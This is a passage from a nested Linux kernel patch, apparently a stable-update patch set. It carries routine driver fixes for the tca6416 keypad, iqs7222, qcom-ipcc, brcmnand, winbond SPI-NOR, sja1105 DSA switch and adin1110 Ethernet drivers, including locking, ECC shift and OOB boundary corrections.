+ static int tca6416_keypad_resume(struct device *dev)
+ {
+ 	struct i2c_client *client = to_i2c_client(dev);
+-	struct tca6416_keypad_chip *chip = i2c_get_clientdata(client);
+ 
+ 	if (device_may_wakeup(dev))
+-		disable_irq_wake(chip->irqnum);
++		disable_irq_wake(client->irq);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/input/misc/iqs7222.c b/drivers/input/misc/iqs7222.c
+index e47ab6c1177f5..f24b174c72667 100644
+--- a/drivers/input/misc/iqs7222.c
++++ b/drivers/input/misc/iqs7222.c
+@@ -1381,9 +1381,6 @@ static int iqs7222_ati_trigger(struct iqs7222_private *iqs7222)
+ 	if (error)
+ 		return error;
+ 
+-	sys_setup &= ~IQS7222_SYS_SETUP_INTF_MODE_MASK;
+-	sys_setup &= ~IQS7222_SYS_SETUP_PWR_MODE_MASK;
+-
+ 	for (i = 0; i < IQS7222_NUM_RETRIES; i++) {
+ 		/*
+ 		 * Trigger ATI from streaming and normal-power modes so that
+@@ -1561,8 +1558,11 @@ static int iqs7222_dev_init(struct iqs7222_private *iqs7222, int dir)
+ 			return error;
+ 	}
+ 
+-	if (dir == READ)
++	if (dir == READ) {
++		iqs7222->sys_setup[0] &= ~IQS7222_SYS_SETUP_INTF_MODE_MASK;
++		iqs7222->sys_setup[0] &= ~IQS7222_SYS_SETUP_PWR_MODE_MASK;
+ 		return 0;
++	}
+ 
+ 	return iqs7222_ati_trigger(iqs7222);
+ }
+diff --git a/drivers/mailbox/qcom-ipcc.c b/drivers/mailbox/qcom-ipcc.c
+index 7e27acf6c0cca..f597a1bd56847 100644
+--- a/drivers/mailbox/qcom-ipcc.c
++++ b/drivers/mailbox/qcom-ipcc.c
+@@ -227,10 +227,8 @@ static int qcom_ipcc_setup_mbox(struct qcom_ipcc *ipcc,
+ 			ret = of_parse_phandle_with_args(client_dn, "mboxes",
+ 						"#mbox-cells", j, &curr_ph);
+ 			of_node_put(curr_ph.np);
+-			if (!ret && curr_ph.np == controller_dn) {
++			if (!ret && curr_ph.np == controller_dn)
+ 				ipcc->num_chans++;
+-				break;
+-			}
+ 		}
+ 	}
+ 
+diff --git a/drivers/mtd/nand/raw/brcmnand/brcmnand.c b/drivers/mtd/nand/raw/brcmnand/brcmnand.c
+index d8418d7fcc372..39661e23d7d4f 100644
+--- a/drivers/mtd/nand/raw/brcmnand/brcmnand.c
++++ b/drivers/mtd/nand/raw/brcmnand/brcmnand.c
+@@ -272,6 +272,7 @@ struct brcmnand_controller {
+ 	const unsigned int	*page_sizes;
+ 	unsigned int		page_size_shift;
+ 	unsigned int		max_oob;
++	u32			ecc_level_shift;
+ 	u32			features;
+ 
+ 	/* for low-power standby/resume only */
+@@ -596,6 +597,34 @@ enum {
+ 	INTFC_CTLR_READY		= BIT(31),
+ };
+ 
++/***********************************************************************
++ * NAND ACC CONTROL bitfield
++ *
++ * Some bits have remained constant throughout hardware revision, while
++ * others have shifted around.
++ ***********************************************************************/
++
++/* Constant for all versions (where supported) */
++enum {
++	/* See BRCMNAND_HAS_CACHE_MODE */
++	ACC_CONTROL_CACHE_MODE				= BIT(22),
++
++	/* See BRCMNAND_HAS_PREFETCH */
++	ACC_CONTROL_PREFETCH				= BIT(23),
++
++	ACC_CONTROL_PAGE_HIT				= BIT(24),
++	ACC_CONTROL_WR_PREEMPT				= BIT(25),
++	ACC_CONTROL_PARTIAL_PAGE			= BIT(26),
++	ACC_CONTROL_RD_ERASED				= BIT(27),
++	ACC_CONTROL_FAST_PGM_RDIN			= BIT(28),
++	ACC_CONTROL_WR_ECC				= BIT(30),
++	ACC_CONTROL_RD_ECC				= BIT(31),
++};
++
++#define	ACC_CONTROL_ECC_SHIFT			16
++/* Only for v7.2 */
++#define	ACC_CONTROL_ECC_EXT_SHIFT		13
++
+ static inline bool brcmnand_non_mmio_ops(struct brcmnand_controller *ctrl)
+ {
+ #if IS_ENABLED(CONFIG_MTD_NAND_BRCMNAND_BCMA)
+@@ -737,6 +766,12 @@ static int brcmnand_revision_init(struct brcmnand_controller *ctrl)
+ 	else if (of_property_read_bool(ctrl->dev->of_node, "brcm,nand-has-wp"))
+ 		ctrl->features |= BRCMNAND_HAS_WP;
+ 
++	/* v7.2 has different ecc level shift in the acc register */
++	if (ctrl->nand_version == 0x0702)
++		ctrl->ecc_level_shift = ACC_CONTROL_ECC_EXT_SHIFT;
++	else
++		ctrl->ecc_level_shift = ACC_CONTROL_ECC_SHIFT;
++
+ 	return 0;
+ }
+ 
+@@ -931,30 +966,6 @@ static inline int brcmnand_cmd_shift(struct brcmnand_controller *ctrl)
+ 	return 0;
+ }
+ 
+-/***********************************************************************
+- * NAND ACC CONTROL bitfield
+- *
+- * Some bits have remained constant throughout hardware revision, while
+- * others have shifted around.
+- ***********************************************************************/
+-
+-/* Constant for all versions (where supported) */
+-enum {
+-	/* See BRCMNAND_HAS_CACHE_MODE */
+-	ACC_CONTROL_CACHE_MODE				= BIT(22),
+-
+-	/* See BRCMNAND_HAS_PREFETCH */
+-	ACC_CONTROL_PREFETCH				= BIT(23),
+-
+-	ACC_CONTROL_PAGE_HIT				= BIT(24),
+-	ACC_CONTROL_WR_PREEMPT				= BIT(25),
+-	ACC_CONTROL_PARTIAL_PAGE			= BIT(26),
+-	ACC_CONTROL_RD_ERASED				= BIT(27),
+-	ACC_CONTROL_FAST_PGM_RDIN			= BIT(28),
+-	ACC_CONTROL_WR_ECC				= BIT(30),
+-	ACC_CONTROL_RD_ECC				= BIT(31),
+-};
+-
+ static inline u32 brcmnand_spare_area_mask(struct brcmnand_controller *ctrl)
+ {
+ 	if (ctrl->nand_version == 0x0702)
+@@ -967,18 +978,15 @@ static inline u32 brcmnand_spare_area_mask(struct brcmnand_controller *ctrl)
+ 		return GENMASK(4, 0);
+ }
+ 
+-#define NAND_ACC_CONTROL_ECC_SHIFT	16
+-#define NAND_ACC_CONTROL_ECC_EXT_SHIFT	13
+-
+ static inline u32 brcmnand_ecc_level_mask(struct brcmnand_controller *ctrl)
+ {
+ 	u32 mask = (ctrl->nand_version >= 0x0600) ? 0x1f : 0x0f;
+ 
+-	mask <<= NAND_ACC_CONTROL_ECC_SHIFT;
++	mask <<= ACC_CONTROL_ECC_SHIFT;
+ 
+ 	/* v7.2 includes additional ECC levels */
+-	if (ctrl->nand_version >= 0x0702)
+-		mask |= 0x7 << NAND_ACC_CONTROL_ECC_EXT_SHIFT;
++	if (ctrl->nand_version == 0x0702)
++		mask |= 0x7 << ACC_CONTROL_ECC_EXT_SHIFT;
+ 
+ 	return mask;
+ }
+@@ -992,8 +1000,8 @@ static void brcmnand_set_ecc_enabled(struct brcmnand_host *host, int en)
+ 
+ 	if (en) {
+ 		acc_control |= ecc_flags; /* enable RD/WR ECC */
+-		acc_control |= host->hwcfg.ecc_level
+-			       << NAND_ACC_CONTROL_ECC_SHIFT;
++		acc_control &= ~brcmnand_ecc_level_mask(ctrl);
++		acc_control |= host->hwcfg.ecc_level << ctrl->ecc_level_shift;
+ 	} else {
+ 		acc_control &= ~ecc_flags; /* disable RD/WR ECC */
+ 		acc_control &= ~brcmnand_ecc_level_mask(ctrl);
+@@ -1072,6 +1080,14 @@ static int bcmnand_ctrl_poll_status(struct brcmnand_controller *ctrl,
+ 		cpu_relax();
+ 	} while (time_after(limit, jiffies));
+ 
++	/*
++	 * do a final check after time out in case the CPU was busy and the driver
++	 * did not get enough time to perform the polling to avoid false alarms
++	 */
++	val = brcmnand_read_reg(ctrl, BRCMNAND_INTFC_STATUS);
++	if ((val & mask) == expected_val)
++		return 0;
++
+ 	dev_warn(ctrl->dev, "timeout on status poll (expected %x got %x)\n",
+ 		 expected_val, val & mask);
+ 
+@@ -1461,19 +1477,33 @@ static int write_oob_to_regs(struct brcmnand_controller *ctrl, int i,
+ 			     const u8 *oob, int sas, int sector_1k)
+ {
+ 	int tbytes = sas << sector_1k;
+-	int j;
++	int j, k = 0;
++	u32 last = 0xffffffff;
++	u8 *plast = (u8 *)&last;
+ 
+ 	/* Adjust OOB values for 1K sector size */
+ 	if (sector_1k && (i & 0x01))
+ 		tbytes = max(0, tbytes - (int)ctrl->max_oob);
+ 	tbytes = min_t(int, tbytes, ctrl->max_oob);
+ 
+-	for (j = 0; j < tbytes; j += 4)
++	/*
++	 * tbytes may not be multiple of words. Make sure we don't read out of
++	 * the boundary and stop at last word.
++	 */
++	for (j = 0; (j + 3) < tbytes; j += 4)
+ 		oob_reg_write(ctrl, j,
+ 				(oob[j + 0] << 24) |
+ 				(oob[j + 1] << 16) |
+ 				(oob[j + 2] <<  8) |
+ 				(oob[j + 3] <<  0));
++
++	/* handle the remaing bytes */
++	while (j < tbytes)
++		plast[k++] = oob[j++];
++
++	if (tbytes & 0x3)
++		oob_reg_write(ctrl, (tbytes & ~0x3), (__force u32)cpu_to_be32(last));
++
+ 	return tbytes;
+ }
+ 
+@@ -1592,7 +1622,17 @@ static void brcmnand_send_cmd(struct brcmnand_host *host, int cmd)
+ 
+ 	dev_dbg(ctrl->dev, "send native cmd %d addr 0x%llx\n", cmd, cmd_addr);
+ 
+-	BUG_ON(ctrl->cmd_pending != 0);
++	/*
++	 * If we came here through _panic_write and there is a pending
++	 * command, try to wait for it. If it times out, rather than
++	 * hitting BUG_ON, just return so we don't crash while crashing.
++	 */
++	if (oops_in_progress) {
++		if (ctrl->cmd_pending &&
++			bcmnand_ctrl_poll_status(ctrl, NAND_CTRL_RDY, NAND_CTRL_RDY, 0))
++			return;
++	} else
++		BUG_ON(ctrl->cmd_pending != 0);
+ 	ctrl->cmd_pending = cmd;
+ 
+ 	ret = bcmnand_ctrl_poll_status(ctrl, NAND_CTRL_RDY, NAND_CTRL_RDY, 0);
+@@ -2561,7 +2601,7 @@ static int brcmnand_set_cfg(struct brcmnand_host *host,
+ 	tmp &= ~brcmnand_ecc_level_mask(ctrl);
+ 	tmp &= ~brcmnand_spare_area_mask(ctrl);
+ 	if (ctrl->nand_version >= 0x0302) {
+-		tmp |= cfg->ecc_level << NAND_ACC_CONTROL_ECC_SHIFT;
++		tmp |= cfg->ecc_level << ctrl->ecc_level_shift;
+ 		tmp |= cfg->spare_area_size;
+ 	}
+ 	nand_writereg(ctrl, acc_control_offs, tmp);
+diff --git a/drivers/mtd/spi-nor/winbond.c b/drivers/mtd/spi-nor/winbond.c
+index ffaa240552598..b7c775b615e85 100644
+--- a/drivers/mtd/spi-nor/winbond.c
++++ b/drivers/mtd/spi-nor/winbond.c
+@@ -120,8 +120,9 @@ static const struct flash_info winbond_nor_parts[] = {
+ 		NO_SFDP_FLAGS(SECT_4K) },
+ 	{ "w25q80bl", INFO(0xef4014, 0, 64 * 1024,  16)
+ 		NO_SFDP_FLAGS(SECT_4K) },
+-	{ "w25q128", INFO(0xef4018, 0, 64 * 1024, 256)
+-		NO_SFDP_FLAGS(SECT_4K) },
++	{ "w25q128", INFO(0xef4018, 0, 0, 0)
++		PARSE_SFDP
++		FLAGS(SPI_NOR_HAS_LOCK | SPI_NOR_HAS_TB) },
+ 	{ "w25q256", INFO(0xef4019, 0, 64 * 1024, 512)
+ 		NO_SFDP_FLAGS(SECT_4K | SPI_NOR_DUAL_READ | SPI_NOR_QUAD_READ)
+ 		.fixups = &w25q256_fixups },
+diff --git a/drivers/net/dsa/sja1105/sja1105.h b/drivers/net/dsa/sja1105/sja1105.h
+index fb3cd4c78faa8..06e0ebfe652a4 100644
+--- a/drivers/net/dsa/sja1105/sja1105.h
++++ b/drivers/net/dsa/sja1105/sja1105.h
+@@ -132,6 +132,8 @@ struct sja1105_info {
+ 	int max_frame_mem;
+ 	int num_ports;
+ 	bool multiple_cascade_ports;
++	/* Every {port, TXQ} has its own CBS shaper */
++	bool fixed_cbs_mapping;
+ 	enum dsa_tag_protocol tag_proto;
+ 	const struct sja1105_dynamic_table_ops *dyn_ops;
+ 	const struct sja1105_table_ops *static_ops;
+@@ -262,6 +264,8 @@ struct sja1105_private {
+ 	 * the switch doesn't confuse them with one another.
+ 	 */
+ 	struct mutex mgmt_lock;
++	/* Serializes accesses to the FDB */
++	struct mutex fdb_lock;
+ 	/* PTP two-step TX timestamp ID, and its serialization lock */
+ 	spinlock_t ts_id_lock;
+ 	u8 ts_id;
+diff --git a/drivers/net/dsa/sja1105/sja1105_dynamic_config.c b/drivers/net/dsa/sja1105/sja1105_dynamic_config.c
+index 7729d3f8b7f50..984c0e604e8de 100644
+--- a/drivers/net/dsa/sja1105/sja1105_dynamic_config.c
++++ b/drivers/net/dsa/sja1105/sja1105_dynamic_config.c
+@@ -1175,18 +1175,15 @@ const struct sja1105_dynamic_table_ops sja1110_dyn_ops[BLK_IDX_MAX_DYN] = {
+ 
+ static int
+ sja1105_dynamic_config_poll_valid(struct sja1105_private *priv,
+-				  struct sja1105_dyn_cmd *cmd,
+-				  const struct sja1105_dynamic_table_ops *ops)
++				  const struct sja1105_dynamic_table_ops *ops,
++				  void *entry, bool check_valident,
++				  bool check_errors)
+ {
+ 	u8 packed_buf[SJA1105_MAX_DYN_CMD_SIZE] = {};
++	struct sja1105_dyn_cmd cmd = {};
+ 	int rc;
+ 
+-	/* We don't _need_ to read the full entry, just the command area which
+-	 * is a fixed SJA1105_SIZE_DYN_CMD. But our cmd_packing() API expects a
+-	 * buffer that contains the full entry too. Additionally, our API
+-	 * doesn't really know how many bytes into the buffer does the command
+-	 * area really begin. So just read back the whole entry.
+-	 */
++	/* Read back the whole entry + command structure. */
+ 	rc = sja1105_xfer_buf(priv, SPI_READ, ops->addr, packed_buf,
+ 			      ops->packed_size);
+ 	if (rc)
+@@ -1195,11 +1192,25 @@ sja1105_dynamic_config_poll_valid(struct sja1105_private *priv,
+ 	/* Unpack the command structure, and return it to the caller in case it
+ 	 * needs to perform further checks on it (VALIDENT).
+ 	 */
+-	memset(cmd, 0, sizeof(*cmd));
+-	ops->cmd_packing(packed_buf, cmd, UNPACK);
++	ops->cmd_packing(packed_buf, &cmd, UNPACK);
+ 
+ 	/* Hardware hasn't cleared VALID => still working on it */
+-	return cmd->valid ? -EAGAIN : 0;
++	if (cmd.valid)
++		return -EAGAIN;
++
++	if (check_valident && !cmd.valident && !(ops->access & OP_VALID_ANYWAY))
++		return -ENOENT;
++
++	if (check_errors && cmd.errors)
++		return -EINVAL;
++
++	/* Don't dereference possibly NULL pointer - maybe caller
++	 * only wanted to see whether the entry existed or not.
++	 */
++	if (entry)
++		ops->entry_packing(packed_buf, entry, UNPACK);
++
++	return 0;
+ }
+ 
+ /* Poll the dynamic config entry's control area until the hardware has
+@@ -1208,16 +1219,19 @@ sja1105_dynamic_config_poll_valid(struct sja1105_private *priv,
+  */
+ static int
+ sja1105_dynamic_config_wait_complete(struct sja1105_private *priv,
+-				     struct sja1105_dyn_cmd *cmd,
+-				     const struct sja1105_dynamic_table_ops *ops)
++				     const struct sja1105_dynamic_table_ops *ops,
++				     void *entry, bool check_valident,
++				     bool check_errors)
+ {
+-	int rc;
+-
+-	return read_poll_timeout(sja1105_dynamic_config_poll_valid,
+-				 rc, rc != -EAGAIN,
+-				 SJA1105_DYNAMIC_CONFIG_SLEEP_US,
+-				 SJA1105_DYNAMIC_CONFIG_TIMEOUT_US,
+-				 false, priv, cmd, ops);
++	int err, rc;
++
++	err = read_poll_timeout(sja1105_dynamic_config_poll_valid,
++				rc, rc != -EAGAIN,
++				SJA1105_DYNAMIC_CONFIG_SLEEP_US,
++				SJA1105_DYNAMIC_CONFIG_TIMEOUT_US,
++				false, priv, ops, entry, check_valident,
++				check_errors);
++	return err < 0 ? err : rc;
+ }
+ 
+ /* Provides read access to the settings through the dynamic interface
+@@ -1286,25 +1300,14 @@ int sja1105_dynamic_config_read(struct sja1105_private *priv,
+ 	mutex_lock(&priv->dynamic_config_lock);
+ 	rc = sja1105_xfer_buf(priv, SPI_WRITE, ops->addr, packed_buf,
+ 			      ops->packed_size);
+-	if (rc < 0) {
+-		mutex_unlock(&priv->dynamic_config_lock);
+-		return rc;
+-	}
+-
+-	rc = sja1105_dynamic_config_wait_complete(priv, &cmd, ops);
+-	mutex_unlock(&priv->dynamic_config_lock);
+ 	if (rc < 0)
+-		return rc;
++		goto out;
+ 
+-	if (!cmd.valident && !(ops->access & OP_VALID_ANYWAY))
+-		return -ENOENT;
++	rc = sja1105_dynamic_config_wait_complete(priv, ops, entry, true, false);
++out:
++	mutex_unlock(&priv->dynamic_config_lock);
+ 
+-	/* Don't dereference possibly NULL pointer - maybe caller
+-	 * only wanted to see whether the entry existed or not.
+-	 */
+-	if (entry)
+-		ops->entry_packing(packed_buf, entry, UNPACK);
+-	return 0;
++	return rc;
+ }
+ 
+ int sja1105_dynamic_config_write(struct sja1105_private *priv,
+@@ -1356,22 +1359,14 @@ int sja1105_dynamic_config_write(struct sja1105_private *priv,
+ 	mutex_lock(&priv->dynamic_config_lock);
+ 	rc = sja1105_xfer_buf(priv, SPI_WRITE, ops->addr, packed_buf,
+ 			      ops->packed_size);
+-	if (rc < 0) {
+-		mutex_unlock(&priv->dynamic_config_lock);
+-		return rc;
+-	}
+-
+-	rc = sja1105_dynamic_config_wait_complete(priv, &cmd, ops);
+-	mutex_unlock(&priv->dynamic_config_lock);
+ 	if (rc < 0)
+-		return rc;
++		goto out;
+ 
+-	cmd = (struct sja1105_dyn_cmd) {0};
+-	ops->cmd_packing(packed_buf, &cmd, UNPACK);
+-	if (cmd.errors)
+-		return -EINVAL;
++	rc = sja1105_dynamic_config_wait_complete(priv, ops, NULL, false, true);
++out:
++	mutex_unlock(&priv->dynamic_config_lock);
+ 
+-	return 0;
++	return rc;
+ }
+ 
+ static u8 sja1105_crc8_add(u8 crc, u8 byte, u8 poly)
+diff --git a/drivers/net/dsa/sja1105/sja1105_main.c b/drivers/net/dsa/sja1105/sja1105_main.c
+index 947e8f7c09880..f1f1368e8146f 100644
+--- a/drivers/net/dsa/sja1105/sja1105_main.c
++++ b/drivers/net/dsa/sja1105/sja1105_main.c
+@@ -1805,6 +1805,7 @@ static int sja1105_fdb_add(struct dsa_switch *ds, int port,
+ 			   struct dsa_db db)
+ {
+ 	struct sja1105_private *priv = ds->priv;
++	int rc;
+ 
+ 	if (!vid) {
+ 		switch (db.type) {
+@@ -1819,12 +1820,16 @@ static int sja1105_fdb_add(struct dsa_switch *ds, int port,
+ 		}
+ 	}
+ 
+-	return priv->info->fdb_add_cmd(ds, port, addr, vid);
++	mutex_lock(&priv->fdb_lock);
++	rc = priv->info->fdb_add_cmd(ds, port, addr, vid);
++	mutex_unlock(&priv->fdb_lock);
++
++	return rc;
+ }
+ 
+-static int sja1105_fdb_del(struct dsa_switch *ds, int port,
+-			   const unsigned char *addr, u16 vid,
+-			   struct dsa_db db)
++static int __sja1105_fdb_del(struct dsa_switch *ds, int port,
++			     const unsigned char *addr, u16 vid,
++			     struct dsa_db db)
+ {
+ 	struct sja1105_private *priv = ds->priv;
+ 
+@@ -1844,6 +1849,20 @@ static int sja1105_fdb_del(struct dsa_switch *ds, int port,
+ 	return priv->info->fdb_del_cmd(ds, port, addr, vid);
+ }
+ 
++static int sja1105_fdb_del(struct dsa_switch *ds, int port,
++			   const unsigned char *addr, u16 vid,
++			   struct dsa_db db)
++{
++	struct sja1105_private *priv = ds->priv;
++	int rc;
++
++	mutex_lock(&priv->fdb_lock);
++	rc = __sja1105_fdb_del(ds, port, addr, vid, db);
++	mutex_unlock(&priv->fdb_lock);
++
++	return rc;
++}
++
+ static int sja1105_fdb_dump(struct dsa_switch *ds, int port,
+ 			    dsa_fdb_dump_cb_t *cb, void *data)
+ {
+@@ -1875,13 +1894,14 @@ static int sja1105_fdb_dump(struct dsa_switch *ds, int port,
+ 		if (!(l2_lookup.destports & BIT(port)))
+ 			continue;
+ 
+-		/* We need to hide the FDB entry for unknown multicast */
+-		if (l2_lookup.macaddr == SJA1105_UNKNOWN_MULTICAST &&
+-		    l2_lookup.mask_macaddr == SJA1105_UNKNOWN_MULTICAST)
+-			continue;
+-
+ 		u64_to_ether_addr(l2_lookup.macaddr, macaddr);
+ 
++		/* Hardware FDB is shared for fdb and mdb, "bridge fdb show"
++		 * only wants to see unicast
++		 */
++		if (is_multicast_ether_addr(macaddr))
++			continue;
++
+ 		/* We need to hide the dsa_8021q VLANs from the user. */
+ 		if (vid_is_dsa_8021q(l2_lookup.vlanid))
+ 			l2_lookup.vlanid = 0;
+@@ -1905,6 +1925,8 @@ static void sja1105_fast_age(struct dsa_switch *ds, int port)
+ 	};
+ 	int i;
+ 
++	mutex_lock(&priv->fdb_lock);
++
+ 	for (i = 0; i < SJA1105_MAX_L2_LOOKUP_COUNT; i++) {
+ 		struct sja1105_l2_lookup_entry l2_lookup = {0};
+ 		u8 macaddr[ETH_ALEN];
+@@ -1918,7 +1940,7 @@ static void sja1105_fast_age(struct dsa_switch *ds, int port)
+ 		if (rc) {
+ 			dev_err(ds->dev, "Failed to read FDB: %pe\n",
+ 				ERR_PTR(rc));
+-			return;
++			break;
+ 		}
+ 
+ 		if (!(l2_lookup.destports & BIT(port)))
+@@ -1930,14 +1952,16 @@ static void sja1105_fast_age(struct dsa_switch *ds, int port)
+ 
+ 		u64_to_ether_addr(l2_lookup.macaddr, macaddr);
+ 
+-		rc = sja1105_fdb_del(ds, port, macaddr, l2_lookup.vlanid, db);
++		rc = __sja1105_fdb_del(ds, port, macaddr, l2_lookup.vlanid, db);
+ 		if (rc) {
+ 			dev_err(ds->dev,
+ 				"Failed to delete FDB entry %pM vid %lld: %pe\n",
+ 				macaddr, l2_lookup.vlanid, ERR_PTR(rc));
+-			return;
++			break;
+ 		}
+ 	}
++
++	mutex_unlock(&priv->fdb_lock);
+ }
+ 
+ static int sja1105_mdb_add(struct dsa_switch *ds, int port,
+@@ -2122,11 +2146,36 @@ static void sja1105_bridge_leave(struct dsa_switch *ds, int port,
+ }
+ 
+ #define BYTES_PER_KBIT (1000LL / 8)
++/* Port 0 (the uC port) does not have CBS shapers */
++#define SJA1110_FIXED_CBS(port, prio) ((((port) - 1) * SJA1105_NUM_TC) + (prio))
++
++static int sja1105_find_cbs_shaper(struct sja1105_private *priv,
++				   int port, int prio)
++{
++	int i;
++
++	if (priv->info->fixed_cbs_mapping) {
++		i = SJA1110_FIXED_CBS(port, prio);
++		if (i >= 0 && i < priv->info->num_cbs_shapers)
++			return i;
++
++		return -1;
++	}
++
++	for (i = 0; i < priv->info->num_cbs_shapers; i++)
++		if (priv->cbs[i].port == port && priv->cbs[i].prio == prio)
++			return i;
++
++	return -1;
++}
+ 
+ static int sja1105_find_unused_cbs_shaper(struct sja1105_private *priv)
+ {
+ 	int i;
+ 
++	if (priv->info->fixed_cbs_mapping)
++		return -1;
++
+ 	for (i = 0; i < priv->info->num_cbs_shapers; i++)
+ 		if (!priv->cbs[i].idle_slope && !priv->cbs[i].send_slope)
+ 			return i;
+@@ -2157,14 +2206,20 @@ static int sja1105_setup_tc_cbs(struct dsa_switch *ds, int port,
+ {
+ 	struct sja1105_private *priv = ds->priv;
+ 	struct sja1105_cbs_entry *cbs;
++	s64 port_transmit_rate_kbps;
+ 	int index;
+ 
+ 	if (!offload->enable)
+ 		return sja1105_delete_cbs_shaper(priv, port, offload->queue);
+ 
+-	index = sja1105_find_unused_cbs_shaper(priv);
+-	if (index < 0)
+-		return -ENOSPC;
++	/* The user may be replacing an existing shaper */
++	index = sja1105_find_cbs_shaper(priv, port, offload->queue);
++	if (index < 0) {
++		/* That isn't the case - see if we can allocate a new one */
++		index = sja1105_find_unused_cbs_shaper(priv);
++		if (index < 0)
++			return -ENOSPC;
++	}
+ 
+ 	cbs = &priv->cbs[index];
+ 	cbs->port = port;
+@@ -2174,9 +2229,17 @@ static int sja1105_setup_tc_cbs(struct dsa_switch *ds, int port,
+ 	 */
+ 	cbs->credit_hi = offload->hicredit;
+ 	cbs->credit_lo = abs(offload->locredit);
+-	/* User space is in kbits/sec, hardware in bytes/sec */
+-	cbs->idle_slope = offload->idleslope * BYTES_PER_KBIT;
+-	cbs->send_slope = abs(offload->sendslope * BYTES_PER_KBIT);
++	/* User space is in kbits/sec, while the hardware in bytes/sec times
++	 * link speed. Since the given offload->sendslope is good only for the
++	 * current link speed anyway, and user space is likely to reprogram it
++	 * when that changes, don't even bother to track the port's link speed,
++	 * but deduce the port transmit rate from idleslope - sendslope.
++	 */
++	port_transmit_rate_kbps = offload->idleslope - offload->sendslope;
++	cbs->idle_slope = div_s64(offload->idleslope * BYTES_PER_KBIT,
++				  port_transmit_rate_kbps);
++	cbs->send_slope = div_s64(abs(offload->sendslope * BYTES_PER_KBIT),
++				  port_transmit_rate_kbps);
+ 	/* Convert the negative values from 64-bit 2's complement
+ 	 * to 32-bit 2's complement (for the case of 0x80000000 whose
+ 	 * negative is still negative).
+@@ -2241,6 +2304,7 @@ int sja1105_static_config_reload(struct sja1105_private *priv,
+ 	int rc, i;
+ 	s64 now;
+ 
++	mutex_lock(&priv->fdb_lock);
+ 	mutex_lock(&priv->mgmt_lock);
+ 
+ 	mac = priv->static_config.tables[BLK_IDX_MAC_CONFIG].entries;
+@@ -2355,6 +2419,7 @@ int sja1105_static_config_reload(struct sja1105_private *priv,
+ 		goto out;
+ out:
+ 	mutex_unlock(&priv->mgmt_lock);
++	mutex_unlock(&priv->fdb_lock);
+ 
+ 	return rc;
+ }
+@@ -2924,7 +2989,9 @@ static int sja1105_port_mcast_flood(struct sja1105_private *priv, int to,
+ {
+ 	struct sja1105_l2_lookup_entry *l2_lookup;
+ 	struct sja1105_table *table;
+-	int match;
++	int match, rc;
++
++	mutex_lock(&priv->fdb_lock);
+ 
+ 	table = &priv->static_config.tables[BLK_IDX_L2_LOOKUP];
+ 	l2_lookup = table->entries;
+@@ -2937,7 +3004,8 @@ static int sja1105_port_mcast_flood(struct sja1105_private *priv, int to,
+ 	if (match == table->entry_count) {
+ 		NL_SET_ERR_MSG_MOD(extack,
+ 				   "Could not find FDB entry for unknown multicast");
+-		return -ENOSPC;
++		rc = -ENOSPC;
++		goto out;
+ 	}
+ 
+ 	if (flags.val & BR_MCAST_FLOOD)
+@@ -2945,10 +3013,13 @@ static int sja1105_port_mcast_flood(struct sja1105_private *priv, int to,
+ 	else
+ 		l2_lookup[match].destports &= ~BIT(to);
+ 
+-	return sja1105_dynamic_config_write(priv, BLK_IDX_L2_LOOKUP,
+-					    l2_lookup[match].index,
+-					    &l2_lookup[match],
+-					    true);
++	rc = sja1105_dynamic_config_write(priv, BLK_IDX_L2_LOOKUP,
++					  l2_lookup[match].index,
++					  &l2_lookup[match], true);
++out:
++	mutex_unlock(&priv->fdb_lock);
++
++	return rc;
+ }
+ 
+ static int sja1105_port_pre_bridge_flags(struct dsa_switch *ds, int port,
+@@ -3318,6 +3389,7 @@ static int sja1105_probe(struct spi_device *spi)
+ 	mutex_init(&priv->ptp_data.lock);
+ 	mutex_init(&priv->dynamic_config_lock);
+ 	mutex_init(&priv->mgmt_lock);
++	mutex_init(&priv->fdb_lock);
+ 	spin_lock_init(&priv->ts_id_lock);
+ 
+ 	rc = sja1105_parse_dt(priv);
+diff --git a/drivers/net/dsa/sja1105/sja1105_spi.c b/drivers/net/dsa/sja1105/sja1105_spi.c
+index d3c9ad6d39d46..e6b61aef4127c 100644
+--- a/drivers/net/dsa/sja1105/sja1105_spi.c
++++ b/drivers/net/dsa/sja1105/sja1105_spi.c
+@@ -781,6 +781,7 @@ const struct sja1105_info sja1110a_info = {
+ 	.tag_proto		= DSA_TAG_PROTO_SJA1110,
+ 	.can_limit_mcast_flood	= true,
+ 	.multiple_cascade_ports	= true,
++	.fixed_cbs_mapping	= true,
+ 	.ptp_ts_bits		= 32,
+ 	.ptpegr_ts_bytes	= 8,
+ 	.max_frame_mem		= SJA1110_MAX_FRAME_MEMORY,
+@@ -831,6 +832,7 @@ const struct sja1105_info sja1110b_info = {
+ 	.tag_proto		= DSA_TAG_PROTO_SJA1110,
+ 	.can_limit_mcast_flood	= true,
+ 	.multiple_cascade_ports	= true,
++	.fixed_cbs_mapping	= true,
+ 	.ptp_ts_bits		= 32,
+ 	.ptpegr_ts_bytes	= 8,
+ 	.max_frame_mem		= SJA1110_MAX_FRAME_MEMORY,
+@@ -881,6 +883,7 @@ const struct sja1105_info sja1110c_info = {
+ 	.tag_proto		= DSA_TAG_PROTO_SJA1110,
+ 	.can_limit_mcast_flood	= true,
+ 	.multiple_cascade_ports	= true,
++	.fixed_cbs_mapping	= true,
+ 	.ptp_ts_bits		= 32,
+ 	.ptpegr_ts_bytes	= 8,
+ 	.max_frame_mem		= SJA1110_MAX_FRAME_MEMORY,
+@@ -931,6 +934,7 @@ const struct sja1105_info sja1110d_info = {
+ 	.tag_proto		= DSA_TAG_PROTO_SJA1110,
+ 	.can_limit_mcast_flood	= true,
+ 	.multiple_cascade_ports	= true,
++	.fixed_cbs_mapping	= true,
+ 	.ptp_ts_bits		= 32,
+ 	.ptpegr_ts_bytes	= 8,
+ 	.max_frame_mem		= SJA1110_MAX_FRAME_MEMORY,
+diff --git a/drivers/net/ethernet/adi/adin1110.c b/drivers/net/ethernet/adi/adin1110.c
+index ecce5f7a549f2..ed2863ed6a5bb 100644
+--- a/drivers/net/ethernet/adi/adin1110.c
++++ b/drivers/net/ethernet/adi/adin1110.c
+@@ -740,7 +740,7 @@ static int adin1110_broadcasts_filter(struct adin1110_port_priv *port_priv,
+ 	u32 port_rules = 0;
+ 	u8 mask[ETH_ALEN];
+ 
+-	memset(mask, 0xFF, ETH_ALEN);
++	eth_broadcast_addr(mask);
+ 
+ 	if (accept_broadcast && port_priv->state == BR_STATE_FORWARDING)
+ 		port_rules = adin1110_port_rules(port_priv, true, true);
+@@ -761,7 +761,7 @@ static int adin1110_set_mac_address(struct net_device *netdev,
+ 		return -EADDRNOTAVAIL;
+ 
